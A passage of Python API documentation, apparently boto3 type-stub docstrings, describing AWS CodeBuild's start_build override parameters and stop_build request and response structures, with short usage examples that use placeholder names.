* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``BUILD_ID`` : Include the build ID in the location of the build output artifact.
* ``NONE`` : Do not include the build ID. This is the default if ``namespaceType`` is not specified.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
- **name** *(string) --*
Along with ``path`` and ``namespaceType`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output artifact object. If you set the name to be a forward slash (\"/\"), the artifact is stored in the root of the output bucket.
For example:
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , then the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
* If ``path`` is empty, ``namespaceType`` is set to ``NONE`` , and ``name`` is set to \"``/`` \", the output artifact is stored in the root of the output bucket.
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to \"``/`` \", the output artifact is stored in ``MyArtifacts/*build-ID* `` .
- **packaging** *(string) --*
The type of build output artifact to create:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output artifacts instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``NONE`` : AWS CodeBuild creates in the output bucket a folder that contains the build output. This is the default if ``packaging`` is not specified.
* ``ZIP`` : AWS CodeBuild creates in the output bucket a ZIP file that contains the build output.
- **overrideArtifactName** *(boolean) --*
If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your output artifacts encrypted. This option is valid only if your artifacts type is Amazon Simple Storage Service (Amazon S3). If this is set with another artifacts type, an invalidInputException is thrown.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
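Putting the ``path`` , ``namespaceType`` , and ``name`` pattern together, the following sketch (with placeholder project and bucket names) stores this build's output at ``MyArtifacts/*build-ID* /MyArtifact.zip`` :
::
import boto3

client = boto3.client('codebuild')

response = client.start_build(
    projectName='my-project',  # placeholder name
    artifactsOverride={
        'type': 'S3',
        'location': 'my-output-bucket',  # placeholder bucket
        'path': 'MyArtifacts',
        'namespaceType': 'BUILD_ID',
        'name': 'MyArtifact.zip',
        'packaging': 'ZIP'
    }
)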
:type secondaryArtifactsOverride: list
:param secondaryArtifactsOverride:
An array of ``ProjectArtifacts`` objects.
- *(dict) --*
Information about the build output artifacts for the build project.
- **type** *(string) --* **[REQUIRED]**
The type of build output artifact. Valid values include:
* ``CODEPIPELINE`` : The build project has build output generated through AWS CodePipeline.
* ``NO_ARTIFACTS`` : The build project does not produce any build output.
* ``S3`` : The build project stores build output in Amazon Simple Storage Service (Amazon S3).
- **location** *(string) --*
Information about the build output artifact location:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output locations instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output bucket.
- **path** *(string) --*
Along with ``namespaceType`` and ``name`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the path to the output artifact. If ``path`` is not specified, ``path`` is not used.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``NONE`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in the output bucket at ``MyArtifacts/MyArtifact.zip`` .
- **namespaceType** *(string) --*
Along with ``path`` and ``name`` , the pattern that AWS CodeBuild uses to determine the name and location to store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``BUILD_ID`` : Include the build ID in the location of the build output artifact.
* ``NONE`` : Do not include the build ID. This is the default if ``namespaceType`` is not specified.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
- **name** *(string) --*
Along with ``path`` and ``namespaceType`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output artifact object. If you set the name to be a forward slash (\"/\"), the artifact is stored in the root of the output bucket.
For example:
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , then the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
* If ``path`` is empty, ``namespaceType`` is set to ``NONE`` , and ``name`` is set to \"``/`` \", the output artifact is stored in the root of the output bucket.
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to \"``/`` \", the output artifact is stored in ``MyArtifacts/*build-ID* `` .
- **packaging** *(string) --*
The type of build output artifact to create:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output artifacts instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``NONE`` : AWS CodeBuild creates in the output bucket a folder that contains the build output. This is the default if ``packaging`` is not specified.
* ``ZIP`` : AWS CodeBuild creates in the output bucket a ZIP file that contains the build output.
- **overrideArtifactName** *(boolean) --*
If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your output artifacts encrypted. This option is valid only if your artifacts type is Amazon Simple Storage Service (Amazon S3). If this is set with another artifacts type, an invalidInputException is thrown.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
:type environmentVariablesOverride: list
:param environmentVariablesOverride:
A set of environment variables that overrides, for this build only, the latest ones already defined in the build project.
- *(dict) --*
Information about an environment variable for a build project or a build.
- **name** *(string) --* **[REQUIRED]**
The name or key of the environment variable.
- **value** *(string) --* **[REQUIRED]**
The value of the environment variable.
.. warning::
We strongly discourage the use of environment variables to store sensitive values, especially AWS access key IDs and secret access keys. Environment variables can be displayed in plain text using the AWS CodeBuild console and the AWS Command Line Interface (AWS CLI).
- **type** *(string) --*
The type of environment variable. Valid values include:
* ``PARAMETER_STORE`` : An environment variable stored in Amazon EC2 Systems Manager Parameter Store.
* ``PLAINTEXT`` : An environment variable in plaintext format.
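For example, a minimal sketch (with placeholder names) that injects one plaintext variable and one variable resolved from Parameter Store for this build only:
::
import boto3

client = boto3.client('codebuild')

response = client.start_build(
    projectName='my-project',  # placeholder name
    environmentVariablesOverride=[
        {'name': 'STAGE', 'value': 'test', 'type': 'PLAINTEXT'},
        # For PARAMETER_STORE, the value is the parameter name, not the secret.
        {'name': 'DB_PASSWORD', 'value': '/myapp/db/password', 'type': 'PARAMETER_STORE'}
    ]
)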
:type sourceTypeOverride: string
:param sourceTypeOverride:
A source input type, for this build, that overrides the source input defined in the build project.
:type sourceLocationOverride: string
:param sourceLocationOverride:
A location that overrides, for this build, the source location for the one defined in the build project.
:type sourceAuthOverride: dict
:param sourceAuthOverride:
An authorization type for this build that overrides the one defined in the build project. This override applies only if the build project\'s source is Bitbucket or GitHub.
- **type** *(string) --* **[REQUIRED]**
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
:type gitCloneDepthOverride: integer
:param gitCloneDepthOverride:
The user-defined depth of history, with a minimum value of 0, that overrides, for this build only, any previous depth of history defined in the build project.
:type gitSubmodulesConfigOverride: dict
:param gitSubmodulesConfigOverride:
Information about the Git submodules configuration for this build of an AWS CodeBuild build project.
- **fetchSubmodules** *(boolean) --* **[REQUIRED]**
Set to true to fetch Git submodules for your AWS CodeBuild build project.
:type buildspecOverride: string
:param buildspecOverride:
A build spec declaration that overrides, for this build only, the latest one already defined in the build project.
:type insecureSslOverride: boolean
:param insecureSslOverride:
Enable this flag to override the insecure SSL setting that is specified in the build project. The insecure SSL setting determines whether to ignore SSL warnings while connecting to the project source code. This override applies only if the build\'s source is GitHub Enterprise.
:type reportBuildStatusOverride: boolean
:param reportBuildStatusOverride:
Set to true to report to your source provider the status of a build\'s start and completion. If you use this option with a source provider other than GitHub, GitHub Enterprise, or Bitbucket, an invalidInputException is thrown.
:type environmentTypeOverride: string
:param environmentTypeOverride:
A container type for this build that overrides the one specified in the build project.
:type imageOverride: string
:param imageOverride:
The name of an image for this build that overrides the one specified in the build project.
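For example, a minimal sketch (with a placeholder project name) that pins this build to an image digest rather than a movable tag:
::
import boto3

client = boto3.client('codebuild')

response = client.start_build(
    projectName='my-project',  # placeholder name
    imageOverride='registry/repository@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf'
)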
:type computeTypeOverride: string
:param computeTypeOverride:
The name of a compute type for this build that overrides the one specified in the build project.
:type certificateOverride: string
:param certificateOverride:
The name of a certificate for this build that overrides the one specified in the build project.
:type cacheOverride: dict
:param cacheOverride:
A ProjectCache object specified for this build that overrides the one defined in the build project.
- **type** *(string) --* **[REQUIRED]**
The type of cache used by the build project. Valid values include:
* ``NO_CACHE`` : The build project does not use any cache.
* ``S3`` : The build project reads and writes from and to S3.
* ``LOCAL`` : The build project stores a cache locally on a build host that is only available to that build host.
- **location** *(string) --*
Information about the cache location:
* ``NO_CACHE`` or ``LOCAL`` : This value is ignored.
* ``S3`` : This is the S3 bucket name/prefix.
- **modes** *(list) --*
If you use a ``LOCAL`` cache, the local cache mode. You can use one or more local cache modes at the same time.
* ``LOCAL_SOURCE_CACHE`` mode caches Git metadata for primary and secondary sources. After the cache is created, subsequent builds pull only the change between commits. This mode is a good choice for projects with a clean working directory and a source that is a large Git repository. If you choose this option and your project does not use a Git repository (GitHub, GitHub Enterprise, or Bitbucket), the option is ignored.
* ``LOCAL_DOCKER_LAYER_CACHE`` mode caches existing Docker layers. This mode is a good choice for projects that build or pull large Docker images. It can prevent the performance issues caused by pulling large Docker images down from the network.
.. note::
* You can use a Docker layer cache in the Linux environment only.
* The ``privileged`` flag must be set so that your project has the required Docker permissions.
* You should consider the security implications before you use a Docker layer cache.
* ``LOCAL_CUSTOM_CACHE`` mode caches directories you specify in the buildspec file. This mode is a good choice if your build scenario is not suited to one of the other local cache modes. If you use a custom cache:
* Only directories can be specified for caching. You cannot specify individual files.
* Symlinks are used to reference cached directories.
* Cached directories are linked to your build before it downloads its project sources. Cached items are overridden if a source item has the same name. Directories are specified using cache paths in the buildspec file.
- *(string) --*
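For example, a minimal sketch (with a placeholder project name) that switches this build to a local cache combining source and Docker layer caching; note that ``LOCAL_DOCKER_LAYER_CACHE`` also requires privileged mode:
::
import boto3

client = boto3.client('codebuild')

response = client.start_build(
    projectName='my-project',  # placeholder name
    privilegedModeOverride=True,  # required by LOCAL_DOCKER_LAYER_CACHE
    cacheOverride={
        'type': 'LOCAL',
        'modes': ['LOCAL_SOURCE_CACHE', 'LOCAL_DOCKER_LAYER_CACHE']
    }
)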
:type serviceRoleOverride: string
:param serviceRoleOverride:
The name of a service role for this build that overrides the one specified in the build project.
:type privilegedModeOverride: boolean
:param privilegedModeOverride:
Enable this flag to override privileged mode in the build project.
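For example, a minimal sketch (with a placeholder project name) that enables privileged mode for a single Docker-image build without changing the project:
::
import boto3

client = boto3.client('codebuild')

response = client.start_build(
    projectName='my-docker-project',  # placeholder name
    privilegedModeOverride=True
)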
:type timeoutInMinutesOverride: integer
:param timeoutInMinutesOverride:
The number of build timeout minutes, from 5 to 480 (8 hours), that overrides, for this build only, the latest setting already defined in the build project.
:type queuedTimeoutInMinutesOverride: integer
:param queuedTimeoutInMinutesOverride:
The number of minutes a build is allowed to be queued before it times out.
:type idempotencyToken: string
:param idempotencyToken:
A unique, case-sensitive identifier you provide to ensure the idempotency of the StartBuild request. The token is included in the StartBuild request and is valid for 12 hours. If you repeat the StartBuild request with the same token, but change a parameter, AWS CodeBuild returns a parameter mismatch error.
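A common pattern is to generate the token once per logical request and reuse it on retries; a minimal sketch:
::
import uuid

import boto3

client = boto3.client('codebuild')

# Reuse this token on retries; a repeat request with the same token and
# identical parameters is idempotent for 12 hours.
token = str(uuid.uuid4())
response = client.start_build(
    projectName='my-project',  # placeholder name
    idempotencyToken=token
)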
:type logsConfigOverride: dict
:param logsConfigOverride:
Log settings for this build that override the log settings defined in the build project.
- **cloudWatchLogs** *(dict) --*
Information about Amazon CloudWatch Logs for a build project. Amazon CloudWatch Logs are enabled by default.
- **status** *(string) --* **[REQUIRED]**
The current status of the logs in Amazon CloudWatch Logs for a build project. Valid values are:
* ``ENABLED`` : Amazon CloudWatch Logs are enabled for this build project.
* ``DISABLED`` : Amazon CloudWatch Logs are not enabled for this build project.
- **groupName** *(string) --*
The group name of the logs in Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **streamName** *(string) --*
The prefix of the stream name of the Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **s3Logs** *(dict) --*
Information about logs built to an S3 bucket for a build project. S3 logs are not enabled by default.
- **status** *(string) --* **[REQUIRED]**
The current status of the S3 build logs. Valid values are:
* ``ENABLED`` : S3 build logs are enabled for this build project.
* ``DISABLED`` : S3 build logs are not enabled for this build project.
- **location** *(string) --*
The ARN of an S3 bucket and the path prefix for S3 logs. If your Amazon S3 bucket name is ``my-bucket`` , and your path prefix is ``build-log`` , then acceptable formats are ``my-bucket/build-log`` or ``arn:aws:s3:::my-bucket/build-log`` .
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your S3 build log output encrypted. By default S3 build logs are encrypted.
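For example, a minimal sketch (with placeholder names) that keeps CloudWatch Logs enabled and also writes this build's logs to S3:
::
import boto3

client = boto3.client('codebuild')

response = client.start_build(
    projectName='my-project',  # placeholder name
    logsConfigOverride={
        'cloudWatchLogs': {
            'status': 'ENABLED',
            'groupName': 'my-log-group',      # placeholder group
            'streamName': 'my-stream-prefix'  # placeholder prefix
        },
        's3Logs': {
            'status': 'ENABLED',
            'location': 'my-bucket/build-log'  # placeholder bucket/prefix
        }
    }
)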
:type registryCredentialOverride: dict
:param registryCredentialOverride:
The credentials for access to a private registry.
- **credential** *(string) --* **[REQUIRED]**
The Amazon Resource Name (ARN) or name of credentials created using AWS Secrets Manager.
.. note::
The ``credential`` can use the name of the credentials only if they exist in your current region.
- **credentialProvider** *(string) --* **[REQUIRED]**
The service that created the credentials to access a private Docker registry. The valid value, SECRETS_MANAGER, is for AWS Secrets Manager.
:type imagePullCredentialsTypeOverride: string
:param imagePullCredentialsTypeOverride:
The type of credentials AWS CodeBuild uses to pull images in your build. There are two valid values:
* ``CODEBUILD`` specifies that AWS CodeBuild uses its own credentials. This requires that you modify your ECR repository policy to trust AWS CodeBuild\'s service principal.
* ``SERVICE_ROLE`` specifies that AWS CodeBuild uses your build project\'s service role.
When using a cross-account or private registry image, you must use SERVICE_ROLE credentials. When using an AWS CodeBuild curated image, you must use CODEBUILD credentials.
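These two overrides are typically used together to pull a private registry image with credentials stored in AWS Secrets Manager; a minimal sketch (the project name and secret ARN are placeholders):
::
import boto3

client = boto3.client('codebuild')

response = client.start_build(
    projectName='my-project',  # placeholder name
    registryCredentialOverride={
        'credential': 'arn:aws:secretsmanager:us-east-1:123456789012:secret:dockerhub-creds',
        'credentialProvider': 'SECRETS_MANAGER'
    },
    # A private registry image requires the service role's credentials.
    imagePullCredentialsTypeOverride='SERVICE_ROLE'
)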
:rtype: dict
:returns:
"""
pass
def stop_build(self, id: str) -> Dict:
"""
Attempts to stop running a build.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/StopBuild>`_
**Request Syntax**
::
response = client.stop_build(
id='string'
)
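Because stopping is asynchronous, a caller often polls ``batch_get_builds`` until the status settles; a minimal sketch (the build ID is a placeholder):
::
import time

import boto3

client = boto3.client('codebuild')

build_id = 'my-project:12345678-1234-1234-1234-123456789012'  # placeholder ID
client.stop_build(id=build_id)

# Poll until the build leaves IN_PROGRESS; a stopped build reports STOPPED.
while True:
    build = client.batch_get_builds(ids=[build_id])['builds'][0]
    if build['buildStatus'] != 'IN_PROGRESS':
        break
    time.sleep(5)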
**Response Syntax**
::
{
'build': {
'id': 'string',
'arn': 'string',
'startTime': datetime(2015, 1, 1),
'endTime': datetime(2015, 1, 1),
'currentPhase': 'string',
'buildStatus': 'SUCCEEDED'|'FAILED'|'FAULT'|'TIMED_OUT'|'IN_PROGRESS'|'STOPPED',
'sourceVersion': 'string',
'resolvedSourceVersion': 'string',
'projectName': 'string',
'phases': [
{
'phaseType': 'SUBMITTED'|'QUEUED'|'PROVISIONING'|'DOWNLOAD_SOURCE'|'INSTALL'|'PRE_BUILD'|'BUILD'|'POST_BUILD'|'UPLOAD_ARTIFACTS'|'FINALIZING'|'COMPLETED',
'phaseStatus': 'SUCCEEDED'|'FAILED'|'FAULT'|'TIMED_OUT'|'IN_PROGRESS'|'STOPPED',
'startTime': datetime(2015, 1, 1),
'endTime': datetime(2015, 1, 1),
'durationInSeconds': 123,
'contexts': [
{
'statusCode': 'string',
'message': 'string'
},
]
},
],
'source': {
'type': 'CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
'location': 'string',
'gitCloneDepth': 123,
'gitSubmodulesConfig': {
'fetchSubmodules': True|False
},
'buildspec': 'string',
'auth': {
'type': 'OAUTH',
'resource': 'string'
},
'reportBuildStatus': True|False,
'insecureSsl': True|False,
'sourceIdentifier': 'string'
},
'secondarySources': [
{
'type': 'CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
'location': 'string',
'gitCloneDepth': 123,
'gitSubmodulesConfig': {
'fetchSubmodules': True|False
},
'buildspec': 'string',
'auth': {
'type': 'OAUTH',
'resource': 'string'
},
'reportBuildStatus': True|False,
'insecureSsl': True|False,
'sourceIdentifier': 'string'
},
],
'secondarySourceVersions': [
{
'sourceIdentifier': 'string',
'sourceVersion': 'string'
},
],
'artifacts': {
'location': 'string',
'sha256sum': 'string',
'md5sum': 'string',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
'secondaryArtifacts': [
{
'location': 'string',
'sha256sum': 'string',
'md5sum': 'string',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
],
'cache': {
'type': 'NO_CACHE'|'S3'|'LOCAL',
'location': 'string',
'modes': [
'LOCAL_DOCKER_LAYER_CACHE'|'LOCAL_SOURCE_CACHE'|'LOCAL_CUSTOM_CACHE',
]
},
'environment': {
'type': 'WINDOWS_CONTAINER'|'LINUX_CONTAINER',
'image': 'string',
'computeType': 'BUILD_GENERAL1_SMALL'|'BUILD_GENERAL1_MEDIUM'|'BUILD_GENERAL1_LARGE',
'environmentVariables': [
{
'name': 'string',
'value': 'string',
'type': 'PLAINTEXT'|'PARAMETER_STORE'
},
],
'privilegedMode': True|False,
'certificate': 'string',
'registryCredential': {
'credential': 'string',
'credentialProvider': 'SECRETS_MANAGER'
},
'imagePullCredentialsType': 'CODEBUILD'|'SERVICE_ROLE'
},
'serviceRole': 'string',
'logs': {
'groupName': 'string',
'streamName': 'string',
'deepLink': 'string',
's3DeepLink': 'string',
'cloudWatchLogs': {
'status': 'ENABLED'|'DISABLED',
'groupName': 'string',
'streamName': 'string'
},
's3Logs': {
'status': 'ENABLED'|'DISABLED',
'location': 'string',
'encryptionDisabled': True|False
}
},
'timeoutInMinutes': 123,
'queuedTimeoutInMinutes': 123,
'buildComplete': True|False,
'initiator': 'string',
'vpcConfig': {
'vpcId': 'string',
'subnets': [
'string',
],
'securityGroupIds': [
'string',
]
},
'networkInterface': {
'subnetId': 'string',
'networkInterfaceId': 'string'
},
'encryptionKey': 'string'
}
}
**Response Structure**
- *(dict) --*
- **build** *(dict) --*
Information about the build.
- **id** *(string) --*
The unique ID for the build.
- **arn** *(string) --*
The Amazon Resource Name (ARN) of the build.
- **startTime** *(datetime) --*
When the build process started, expressed in Unix time format.
- **endTime** *(datetime) --*
When the build process ended, expressed in Unix time format.
- **currentPhase** *(string) --*
The current build phase.
- **buildStatus** *(string) --*
The current status of the build. Valid values include:
* ``FAILED`` : The build failed.
* ``FAULT`` : The build faulted.
* ``IN_PROGRESS`` : The build is still in progress.
* ``STOPPED`` : The build stopped.
* ``SUCCEEDED`` : The build succeeded.
* ``TIMED_OUT`` : The build timed out.
- **sourceVersion** *(string) --*
Any version identifier for the version of the source code to be built.
- **resolvedSourceVersion** *(string) --*
An identifier for the version of this build's source code.
* For AWS CodeCommit, GitHub, GitHub Enterprise, and Bitbucket, the commit ID.
* For AWS CodePipeline, the source revision provided by AWS CodePipeline.
* For Amazon Simple Storage Service (Amazon S3), this does not apply.
- **projectName** *(string) --*
The name of the AWS CodeBuild project.
- **phases** *(list) --*
Information about all previous build phases that are complete and information about any current build phase that is not yet complete.
- *(dict) --*
Information about a stage for a build.
- **phaseType** *(string) --*
The name of the build phase. Valid values include:
* ``BUILD`` : Core build activities typically occur in this build phase.
* ``COMPLETED`` : The build has been completed.
* ``DOWNLOAD_SOURCE`` : Source code is being downloaded in this build phase.
* ``FINALIZING`` : The build process is completing in this build phase.
* ``INSTALL`` : Installation activities typically occur in this build phase.
* ``POST_BUILD`` : Post-build activities typically occur in this build phase.
* ``PRE_BUILD`` : Pre-build activities typically occur in this build phase.
* ``PROVISIONING`` : The build environment is being set up.
* ``QUEUED`` : The build has been submitted and is queued behind other submitted builds.
* ``SUBMITTED`` : The build has been submitted.
* ``UPLOAD_ARTIFACTS`` : Build output artifacts are being uploaded to the output location.
- **phaseStatus** *(string) --*
The current status of the build phase. Valid values include:
* ``FAILED`` : The build phase failed.
* ``FAULT`` : The build phase faulted.
* ``IN_PROGRESS`` : The build phase is still in progress.
* ``QUEUED`` : The build has been submitted and is queued behind other submitted builds.
* ``STOPPED`` : The build phase stopped.
* ``SUCCEEDED`` : The build phase succeeded.
* ``TIMED_OUT`` : The build phase timed out.
- **startTime** *(datetime) --*
When the build phase started, expressed in Unix time format.
- **endTime** *(datetime) --*
When the build phase ended, expressed in Unix time format.
- **durationInSeconds** *(integer) --*
The duration, in seconds, between the start and end times of the build's phase.
- **contexts** *(list) --*
Additional information about a build phase, especially to help troubleshoot a failed build.
- *(dict) --*
Additional information about a build phase that has an error. You can use this information for troubleshooting.
- **statusCode** *(string) --*
The status code for the context of the build phase.
- **message** *(string) --*
An explanation of the build phase's context. This might include a command ID and an exit code.
- **source** *(dict) --*
Information about the source code to be built.
- **type** *(string) --*
The type of repository that contains the source code to be built. Valid values include:
* ``BITBUCKET`` : The source code is in a Bitbucket repository.
* ``CODECOMMIT`` : The source code is in an AWS CodeCommit repository.
* ``CODEPIPELINE`` : The source code settings are specified in the source action of a pipeline in AWS CodePipeline.
* ``GITHUB`` : The source code is in a GitHub repository.
* ``NO_SOURCE`` : The project does not have input source code.
* ``S3`` : The source code is in an Amazon Simple Storage Service (Amazon S3) input bucket.
- **location** *(string) --*
Information about the location of the source code to be built. Valid values include:
* For source code settings that are specified in the source action of a pipeline in AWS CodePipeline, ``location`` should not be specified. If it is specified, AWS CodePipeline ignores it. This is because AWS CodePipeline uses the settings in a pipeline's source action instead of this value.
* For source code in an AWS CodeCommit repository, the HTTPS clone URL to the repository that contains the source code and the build spec (for example, ``https://git-codecommit.*region-ID* .amazonaws.com/v1/repos/*repo-name* `` ).
* For source code in an Amazon Simple Storage Service (Amazon S3) input bucket, one of the following.
* The path to the ZIP file that contains the source code (for example, `` *bucket-name* /*path* /*to* /*object-name* .zip`` ).
* The path to the folder that contains the source code (for example, `` *bucket-name* /*path* /*to* /*source-code* /*folder* /`` ).
* For source code in a GitHub repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your GitHub account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with GitHub, on the GitHub **Authorize application** page, for **Organization access** , choose **Request access** next to each repository you want to allow AWS CodeBuild to have access to, and then choose **Authorize application** . (After you have connected to your GitHub account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
* For source code in a Bitbucket repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your Bitbucket account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with Bitbucket, on the Bitbucket **Confirm access to your account** page, choose **Grant access** . (After you have connected to your Bitbucket account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
- **gitCloneDepth** *(integer) --*
Information about the Git clone depth for the build project.
- **gitSubmodulesConfig** *(dict) --*
Information about the Git submodules configuration for the build project.
- **fetchSubmodules** *(boolean) --*
Set to true to fetch Git submodules for your AWS CodeBuild build project.
- **buildspec** *(string) --*
The build spec declaration to use for the builds in this build project.
If this value is not specified, a build spec must be included along with the source code to be built.
- **auth** *(dict) --*
Information about the authorization settings for AWS CodeBuild to access the source code to be built.
This information is for the AWS CodeBuild console's use only. Your code should not get or set this information directly.
- **type** *(string) --*
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
- **reportBuildStatus** *(boolean) --*
Set to true to report the status of a build's start and finish to your source provider. This option is valid only when your source provider is GitHub, GitHub Enterprise, or Bitbucket. If this is set and you use a different source provider, an invalidInputException is thrown.
- **insecureSsl** *(boolean) --*
Enable this flag to ignore SSL warnings while connecting to the project source code.
- **sourceIdentifier** *(string) --*
An identifier for this project source.
- **secondarySources** *(list) --*
An array of ``ProjectSource`` objects.
- *(dict) --*
Information about the build input source code for the build project.
- **type** *(string) --*
The type of repository that contains the source code to be built. Valid values include:
* ``BITBUCKET`` : The source code is in a Bitbucket repository.
* ``CODECOMMIT`` : The source code is in an AWS CodeCommit repository.
* ``CODEPIPELINE`` : The source code settings are specified in the source action of a pipeline in AWS CodePipeline.
* ``GITHUB`` : The source code is in a GitHub repository.
* ``NO_SOURCE`` : The project does not have input source code.
* ``S3`` : The source code is in an Amazon Simple Storage Service (Amazon S3) input bucket.
- **location** *(string) --*
Information about the location of the source code to be built. Valid values include:
* For source code settings that are specified in the source action of a pipeline in AWS CodePipeline, ``location`` should not be specified. If it is specified, AWS CodePipeline ignores it. This is because AWS CodePipeline uses the settings in a pipeline's source action instead of this value.
* For source code in an AWS CodeCommit repository, the HTTPS clone URL to the repository that contains the source code and the build spec (for example, ``https://git-codecommit.*region-ID* .amazonaws.com/v1/repos/*repo-name* `` ).
* For source code in an Amazon Simple Storage Service (Amazon S3) input bucket, one of the following.
* The path to the ZIP file that contains the source code (for example, `` *bucket-name* /*path* /*to* /*object-name* .zip`` ).
* The path to the folder that contains the source code (for example, `` *bucket-name* /*path* /*to* /*source-code* /*folder* /`` ).
* For source code in a GitHub repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your GitHub account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with GitHub, on the GitHub **Authorize application** page, for **Organization access** , choose **Request access** next to each repository you want to allow AWS CodeBuild to have access to, and then choose **Authorize application** . (After you have connected to your GitHub account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
